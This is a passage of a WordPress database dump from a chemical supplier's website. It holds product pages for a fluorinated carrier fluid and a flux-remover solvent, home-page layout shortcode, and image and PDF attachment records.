Point</td>\n<td style="text-align: center;">°C (°F)</td>\n<td style="text-align: center;">110 (230)</td>\n</tr>\n<tr>\n<td>Freezing Point</td>\n<td style="text-align: center;">°C (°F)</td>\n<td style="text-align: center;">&lt; -90 (&lt;-130)</td>\n</tr>\n<tr>\n<td>Critical Temperature</td>\n<td style="text-align: center;">°C (°F)</td>\n<td style="text-align: center;">240 (464)</td>\n</tr>\n<tr>\n<td style="text-align: left;">KB Value</td>\n<td></td>\n<td style="text-align: center;">6</td>\n</tr>\n<tr>\n<td>Liquid Density</td>\n<td style="text-align: center;">kg/m^3 (lb/gal)</td>\n<td style="text-align: center;">1580 (13.1)</td>\n</tr>\n<tr>\n<td>Liquid Viscosity</td>\n<td style="text-align: center;">cSt</td>\n<td style="text-align: center;">0.71</td>\n</tr>\n<tr>\n<td>Liquid Specific Heat</td>\n<td style="text-align: center;">kJ/kg-K</td>\n<td style="text-align: center;">1</td>\n</tr>\n<tr>\n<td>Liquid Thermal Conductivity</td>\n<td style="text-align: center;">W/m-K</td>\n<td style="text-align: center;">0.065</td>\n</tr>\n<tr>\n<td>Surface Tension</td>\n<td style="text-align: center;">dyn/cm</td>\n<td style="text-align: center;">18</td>\n</tr>\n<tr>\n<td>Vapor Pressure</td>\n<td style="text-align: center;">kPa</td>\n<td style="text-align: center;">2.9</td>\n</tr>\n<tr>\n<td>Heat of Vaporization</td>\n<td style="text-align: center;">kJ/kg</td>\n<td style="text-align: center;">115</td>\n</tr>\n<tr>\n<td>Solubility in Water</td>\n<td style="text-align: center;">ppm (w/w)</td>\n<td style="text-align: center;">&lt;1</td>\n</tr>\n<tr>\n<td>Water Solubility</td>\n<td style="text-align: center;">ppm (w/w)</td>\n<td style="text-align: center;">80</td>\n</tr>\n<tr>\n<td>Flash Point, CC, ASTM D56</td>\n<td style="text-align: center;">-</td>\n<td style="text-align: center;">None</td>\n</tr>\n<tr>\n<td style="text-align: left;">Flash Point, OC, ASTM D1310</td>\n<td style="text-align: center;">-</td>\n<td style="text-align: center;">None</td>\n</tr>\n<tr>\n<td>Vapor Flammability, ASTM E681</td>\n<td style="text-align: center;">-</td>\n<td style="text-align: center;">None</td>\n</tr>\n</tbody>\n</table>\n<h4><strong>Vapor Pressure</strong></h4>\nPlease refer to the following equation to predict vapor pressure as a function of temperature.\n\nVapor Pressure (kPa) = exp(14.65 – 3280/[T + 216.4]) T in °C\n<h4><strong>Storage and Handling</strong></h4>\nOpteon™ Suprion carrier fluid is thermally stable, does not oxidize or degrade during storage, and has no shelf life. Store product in a clean dry area, protect from freezing temperatures, and do not allow stored container to exceed 52 °C ( 125.6 °F). Package sizes for Opteon™ Suprion carrier fluid are available in 6 and 15 kg net weight in high density polyethylene containers and in 300 kg stainless steel drums. When pumping or transferring Opteon™ Suprion carrier fluid from a drum, a braided stainless steel hose is recommended. If a flexible hose is desired, a static charge dissipation hose is recommended, i.e., one constructed with carbon black-filled nylon inner core conductive material.\n<h4><strong>Liquid Density</strong></h4>\nThe temperature dependence of liquid density for Opteon™ Suprion carrier fluid is shown below\n\n<img class="size-full wp-image-2622 alignnone" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/liquid-density-opteon-suprion.jpg" alt="liquid-density-opteon-suprion" width="517" height="333" />\n<h4><strong>Liquid Viscosity</strong></h4>\nThe temperature dependence of liquid viscosity for Opteon™ Suprion carrier fluid is shown below.\n\n<img class="alignnone size-full wp-image-2623" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/liquid-viscosity-opteon-suprion.jpg" alt="liquid-viscosity-opteon-suprion" width="533" height="335" />\n<h4><strong>Critical Heat Flux</strong></h4>\nThe critical heat flux of Opteon™ Suprion carrier fluid was estimated at 16 W/cm^2, but the actual value in use will depend on heater geometry and operating conditions. It is recommended that users consult with their local Opteon™ specialty fluids representative for applications requiring a heat flux greater than 12 W/cm^2.\n\n<a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/">To learn more about the Opteon™ series click here.</a>\n\n&nbsp;\n\n&nbsp;', 'Suprion', 'Formerly known as Opteon™ Suprion carrier fluid is a clear, colorless, nonflammable, thermally stable, fluorinated fluid developed in response to worldwide market demand for a low environmental impact solvent for cleaning, as a carrier fluid, and many other applications. The fluid has a boiling point of 110 °C (230 °F), zero ozone depletion potential (ODP), and a very low global warming potential (GWP) of 2.5 (100-yr ITH). Opteon™ Suprion carrier fluid is appropriate to replace PFCs, PFPEs, HFEs, HFCs, and HCFCs in carrier fluid applications.', 'inherit', 'closed', 'closed', '', '1344-autosave-v1', '', '', '2016-10-13 15:44:12', '2016-10-13 15:44:12', '', 1344, 'https://132.148.10.86/wordpress/1344-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1347, 2, '2016-09-08 12:18:37', '2016-09-08 12:18:37', '', 'opteon-suprion', '', 'inherit', 'open', 'closed', '', 'opteon-suprion-2', '', '', '2016-09-08 12:18:37', '2016-09-08 12:18:37', '', 1344, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/opteon-suprion.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1348, 3, '2016-09-08 12:38:32', '2016-09-08 12:38:32', '', 'VAZO 64 AIBN NEW', '', 'inherit', 'open', 'closed', '', 'vazo-64-aibn-new', '', '', '2016-09-08 12:38:32', '2016-09-08 12:38:32', '', 427, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VAZO-64-AIBN-NEW.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1349, 2, '2016-09-08 12:40:11', '2016-09-08 12:40:11', '', 'opteon-sion-specialty-cleaning-fluid-technical-information', '', 'inherit', 'open', 'closed', '', 'opteon-sion-specialty-cleaning-fluid-technical-information', '', '', '2016-09-08 12:40:11', '2016-09-08 12:40:11', '', 1287, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/opteon-sion-specialty-cleaning-fluid-technical-information.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1350, 3, '2016-09-08 12:42:42', '2016-09-08 12:42:42', '', 'VAZO 64 AIBN NEW2', '', 'inherit', 'open', 'closed', '', 'vazo-64-aibn-new2', '', '', '2016-09-08 12:42:42', '2016-09-08 12:42:42', '', 427, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VAZO-64-AIBN-NEW2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1351, 3, '2016-09-08 12:55:08', '2016-09-08 12:55:08', '', 'VAZO 52 NEW', '', 'inherit', 'open', 'closed', '', 'vazo-52-new', '', '', '2016-09-08 12:55:08', '2016-09-08 12:55:08', '', 568, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VAZO-52-NEW.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1352, 3, '2016-09-08 13:09:18', '2016-09-08 13:09:18', '', 'VAZO 67 NEW', '', 'inherit', 'open', 'closed', '', 'vazo-67-new', '', '', '2016-09-08 13:09:18', '2016-09-08 13:09:18', '', 575, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VAZO-67-NEW.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1353, 3, '2016-09-08 13:17:18', '2016-09-08 13:17:18', '', 'vazo88 (2)', '', 'inherit', 'open', 'closed', '', 'vazo88-2', '', '', '2016-09-08 13:17:18', '2016-09-08 13:17:18', '', 577, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/vazo88-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1354, 3, '2016-09-08 13:30:51', '2016-09-08 13:30:51', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; experience, Miller Stephenson\'s team of technical service representatives can help you find solutions to any of your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-08 13:30:51', '2016-09-08 13:30:51', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1355, 3, '2016-09-08 14:28:03', '2016-09-08 14:28:03', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="epoxy-and-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="1259" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1261"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-08 14:28:03', '2016-09-08 14:28:03', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1356, 3, '2016-09-08 14:37:27', '2016-09-08 14:37:27', '', 'Biocompatible Lubricants', '', 'inherit', 'open', 'closed', '', 'mi', '', '', '2017-01-17 20:30:46', '2017-01-17 20:30:46', '', 468, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Mi.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1357, 3, '2016-09-08 14:43:48', '2016-09-08 14:43:48', '', 'Fluoropolymer Medical Coatings', '', 'inherit', 'open', 'closed', '', 'fluoropolymer-coating-catheter-guidewire', '', '', '2016-11-24 03:07:05', '2016-11-24 03:07:05', '', 469, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Fluoropolymer-coating-Catheter-guidewire.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1358, 3, '2016-09-08 14:51:20', '2016-09-08 14:51:20', '', 'MMF_1657', '', 'inherit', 'open', 'closed', '', 'mmf_1657', '', '', '2016-09-08 14:51:20', '2016-09-08 14:51:20', '', 467, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MMF_1657.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1359, 3, '2016-09-13 14:14:45', '2016-09-13 14:14:45', '', 'TriboSys Fluorinated Synthetic Lubricants', '<p class="Body"><span class="C-8">TriboSys PFPE (perfluoropolyether) oils and greases provide superior quality lubrication under the most challenging medical application in comparison to hydrocarbon and silicone alternatives. MilLube™ was designed to decrease wear and extend service intervals on all medical devices. Medical device engineers will value the dramatic decrease in mechanical wear, unwanted noise, and broad temperature range our lubricants impart.  All variants of MilLube™ are unaffected by all forms of sterilization and will not transfer or degrade under these conditions. Benefits include:\n\n● Superior Lubrication over conventional alternatives\n● Biocompatible (ISO 10993)\n● Chemically Inert; Non-<wbr />nutrient\n● Non-<wbr />Flammable; Oxygen-<wbr />safe\n● Odorless and Non-<wbr />Staining</span></p>', 'inherit', 'closed', 'closed', '', '468-autosave-v1', '', '', '2016-09-13 14:14:45', '2016-09-13 14:14:45', '', 468, 'https://132.148.10.86/wordpress/468-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1360, 3, '2016-09-08 15:20:23', '2016-09-08 15:20:23', '', 'wp7619bf38_06', '', 'inherit', 'open', 'closed', '', 'wp7619bf38_06', '', '', '2016-09-08 15:20:23', '2016-09-08 15:20:23', '', 468, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/wp7619bf38_06.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (1361, 3, '2016-09-08 15:21:43', '2016-09-08 15:21:43', '', 'ML4', '', 'inherit', 'open', 'closed', '', 'ml4', '', '', '2016-09-08 15:21:43', '2016-09-08 15:21:43', '', 468, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ML4.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1362, 3, '2016-09-08 15:54:51', '2016-09-08 15:54:51', '', '2A', '', 'inherit', 'open', 'closed', '', '2a', '', '', '2016-09-08 15:54:51', '2016-09-08 15:54:51', '', 469, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/2A.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (1363, 3, '2016-09-08 15:55:44', '2016-09-08 15:55:44', '', 'canstockphoto16166200', '', 'inherit', 'open', 'closed', '', 'canstockphoto16166200', '', '', '2016-09-08 15:55:44', '2016-09-08 15:55:44', '', 469, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto16166200.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1364, 3, '2016-09-08 15:59:16', '2016-09-08 15:59:16', '', 'canstockphoto8701169', '', 'inherit', 'open', 'closed', '', 'canstockphoto8701169', '', '', '2016-09-08 15:59:16', '2016-09-08 15:59:16', '', 469, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto8701169.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1367, 3, '2016-09-08 17:52:53', '2016-09-08 17:52:53', '', 'Products Available', '', 'publish', 'closed', 'closed', '', 'products-available', '', '', '2016-09-08 17:53:07', '2016-09-08 17:53:07', '', 0, 'https://132.148.10.86/wordpress/?post_type=ywtm_tab&#038;p=1367', 0, 'ywtm_tab', '', 0); 
INSERT INTO `wp_posts` VALUES (1368, 3, '2016-09-08 18:02:57', '2016-09-08 18:02:57', 'https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/', 'Fluoropolymer PTFE coatings', '', 'inherit', 'closed', 'closed', '', 'fluoropolymer-ptfe-coatings-2', '', '', '2016-12-20 19:44:54', '2016-12-20 19:44:54', '', 469, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Fluoropolymer-PTFE-coatings-1.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1369, 3, '2016-09-08 18:20:53', '2016-09-08 18:20:53', '', 'wp269fdbab_05_06', '', 'inherit', 'open', 'closed', '', 'wp269fdbab_05_06', '', '', '2016-09-08 18:20:53', '2016-09-08 18:20:53', '', 467, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/wp269fdbab_05_06.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1370, 3, '2016-09-08 18:26:11', '2016-09-08 18:26:11', '', 'canstockphoto0300365', '', 'inherit', 'open', 'closed', '', 'canstockphoto0300365', '', '', '2016-09-08 18:26:11', '2016-09-08 18:26:11', '', 467, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto0300365.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1371, 3, '2016-09-08 18:41:10', '2016-09-08 18:41:10', '', 'S3', '', 'inherit', 'open', 'closed', '', 's3', '', '', '2016-09-08 18:41:10', '2016-09-08 18:41:10', '', 473, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/S3.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1372, 3, '2016-09-08 18:42:19', '2016-09-08 18:42:19', '', 'S4', '', 'inherit', 'open', 'closed', '', 's4', '', '', '2016-09-08 18:42:19', '2016-09-08 18:42:19', '', 473, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/S4.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1373, 3, '2016-09-08 18:43:06', '2016-09-08 18:43:06', '', 'S2', '', 'inherit', 'open', 'closed', '', 's2', '', '', '2016-09-08 18:43:06', '2016-09-08 18:43:06', '', 473, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/S2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1377, 2, '2016-09-08 19:24:05', '2016-09-08 19:24:05', '', 'Protective-Coatings', '', 'inherit', 'open', 'closed', '', 'protective-coatings', '', '', '2016-09-08 19:26:50', '2016-09-08 19:26:50', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Protective-Coatings.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1381, 1, '2016-09-08 21:28:12', '0000-00-00 00:00:00', '', '', '', 'draft', 'closed', 'closed', '', '', '', '', '2016-09-08 21:28:12', '2016-09-08 21:28:12', '', 0, 'https://132.148.10.86/wordpress/?post_type=gsc_woo_g_car&#038;p=1381', 0, 'gsc_woo_g_car', '', 0); 
INSERT INTO `wp_posts` VALUES (1384, 2, '2016-09-09 13:37:53', '2016-09-09 13:37:53', '<h3><strong>Heavy Duty Solvent &amp; Flux Remover | SolvSys™ MS-555 (Aerosol) </strong><strong>MS-557 (Bulk Liquid)</strong></h3>\r\nOur most aggressive flux remover and heavy duty solvent. A superior solvent for flux removal and heavy duty cleaning. Suitable for removing oil, ionic salts, and particulate matter. Ideal for field service, production, and prototype work. Evaporates quickly and leaves no residue. It replaces n-PB and HCFC-225 in many applications.\r\n\r\n<strong>ADVANTAGES:</strong>\r\n<ul>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Non ozone-depleting</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>\r\n<strong>PROPERTIES OF SOLVENT:</strong>\r\n\r\nBoiling Point………………………………… 95°F/34°C\r\n\r\nLiquid Density…………………..1.28 g/ml @ 77°F/25°C\r\n\r\nOzone Depletion……………………………………..0.00\r\n\r\n<strong>PLASTIC COMPATIBILITY:</strong>\r\n\r\n<span style="font-size: 14.4px;">(Immersion: 15 minutes at Room Temperature)</span>\r\n<ul>\r\n 	<li>Acetal</li>\r\n 	<li>Polyethylene</li>\r\n 	<li>Polypropylene</li>\r\n 	<li>Liquid Crystal Polymer</li>\r\n 	<li>Polyester, PBT, PET</li>\r\n 	<li>Epoxy</li>\r\n 	<li>Polysulfone, PSO</li>\r\n 	<li>PEK, PEEK</li>\r\n 	<li>Polyimides</li>\r\n 	<li>PTFE</li>\r\n 	<li>Phenolic</li>\r\n 	<li>Polyvinylchloride</li>\r\n</ul>\r\nNOTE: Acrylic, ABS, and polycarbonate, if under stress, may show slight cracking or crazing damage. Test for compatibility before use.\r\n\r\n<strong>ELASTOMER COMPATIBILITY:</strong>\r\n\r\n(Immersion: 15 mins at Room Temperature)\r\n<ul>\r\n 	<li>Butyl Rubber*</li>\r\n 	<li>Natural Rubber</li>\r\n 	<li>Polysulfide</li>\r\n 	<li>EPDM</li>\r\n 	<li>Buna S*</li>\r\n 	<li>Buna N</li>\r\n 	<li>Neoprene*</li>\r\n 	<li>Urethane</li>\r\n 	<li>Chlorosuflonated PE</li>\r\n 	<li>Silicone</li>\r\n 	<li>Fluoroelastomers</li>\r\n</ul>\r\n*Swelling, but with low extractables.\r\n\r\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of the elastomers. Test for compatibility before use.\r\n\r\n<strong>METAL COMPATIBILITY:</strong>\r\n\r\n(Immersion: 2 weeks at 248°F/120°C)\r\n<ul>\r\n 	<li>Aluminum</li>\r\n 	<li>Copper</li>\r\n 	<li>Iron</li>\r\n</ul>\r\nNote: Test for compatibility before use.\r\n\r\nSafety Data Sheets (SDS) are available upon request.', 'MS-555/557', '<strong>Removes Organic Flux, Ionic Salts and Oil.</strong>\r\n\r\nOur most aggressive flux remover. An, economical and superior solvent for flux removal and heavy duty cleaning. 